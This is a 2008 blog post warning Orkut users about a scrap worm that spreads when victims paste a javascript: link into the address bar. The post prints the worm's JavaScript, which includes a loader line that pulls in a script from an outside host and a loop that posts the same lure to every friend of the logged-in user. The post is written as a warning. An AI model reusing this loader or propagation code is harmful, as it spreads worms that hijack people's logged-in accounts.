Thursday, February 07, 2008

Orkut and Scraps with Scripts

I normally do not try clicking or pasting a link when it is received as an Orkut Scrap post or an email, unless it really make some sense. Today I got one scrap entry in my Orkut from a friend of mine asking me to copy paste a line to the address bar and then hit enter. I tried that to find out what is happening behind the screens... And I was surprised to see that it was posting the similar scrap to all friends in my Orkut account under cover! I was embarrassed too, to know that I never suspected that!

Here is what these scripts will do:

1. You get a scrap post in Orkut from a friend of yours asking to copy paste some lines into the address bar and then hit enter too see some tricks or to view some information.

2. Actually these lines will be a piece of code in java script, and mostly pointing to another script file hosted somewhere else.

3. Javascripts can execute even from the address bar of the browser. These scripts will have the logic coded inside to get access to different sections in your orkut.

4. Since you are already logged into Orkut, and the script is running from that page, it is possible to fetch all your friends’ details, or all your scraps, and do things like sending scraps to all on behalf of you.

5. While you are busy enjoying the superficial trick of the scripts (like showing all your friends’ photos in an interesting animation, or a detailed web page with some useful information), the script will be busy doing these kinds of activities under cover.

Below is the content of such a java script:


    function SendScrapToAll()
{
var scrapText;
scrapText = "[blue]Here are some cool pic..BY [green]JINESH JAIN[/green].. [blue]Just copy the JavaScript, paste it in your address bar and PRESS ENTER[/blue]" +
"<br><br>"+
"[orange]<i>javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http://tricks80.googlepages.com/20885.user.js';void(0)</i>[/orange]"+
"<br><br>"+
"[red]trust me, you'll find thispic funny! [:)] ";

if(c == select.length)
return;

try{
if(select[c].value!="")
{
sendScrap(select[c].value,scrapText);
}
}catch(e){
//Suppressed Exception
} finally {
c = c+ 1;
setTimeout("SendScrapToAll()", 666);
}
}

So be aware…. And never run any scripts or click on links that comes as scrap entries!

3 comments:

  1. I got a few as well. I don't know what's more funny, the fact that you can see 'javascript' written in the link or that the coder is handling exceptions as well.

    ReplyDelete
  2. Thanks Sudhir... looks like he is the one who did it...

    ReplyDelete